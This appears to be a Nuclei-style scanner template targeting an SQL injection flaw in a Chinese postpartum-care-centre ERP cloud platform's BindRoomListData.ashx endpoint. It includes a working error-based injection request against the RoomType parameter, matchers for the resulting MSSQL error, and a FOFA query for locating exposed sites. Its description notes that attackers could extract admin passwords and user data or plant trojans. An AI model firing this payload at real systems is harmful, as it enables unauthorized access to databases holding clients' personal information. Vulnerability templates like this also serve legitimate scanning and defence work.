http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - Microsoft SQL
            - 转换成数据类型 int 时失败
        - status:
            - 500
          type: status
      matchers-condition: and
      raw:
        - |
          GET /Page/SalerManager/ashx/BindRoomListData.ashx?RZParam=1&RoomID=1&RoomName=1&RoomStyle=1&RoomType=1'%20and%201%3dconvert(int,@@version)--&ddlFStoreID=1&IsShowCount=1 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
id: yueziERP-BindRoomListData_ashx-sql
info:
    author: Superhero
    description: |-
        fofa: body="月子护理ERP管理平台" || body="妈妈宝盒客户端.rar" || body="Page/Login/Login3.aspx"
        月子会所ERP管理云平台 BindRoomListData.ashx 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 月子会所ERP管理云平台 BindRoomListData.ashx SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/aMVl8bYR8DUU4Dt20sz-2A
    severity: high
    tags:
        - SSH
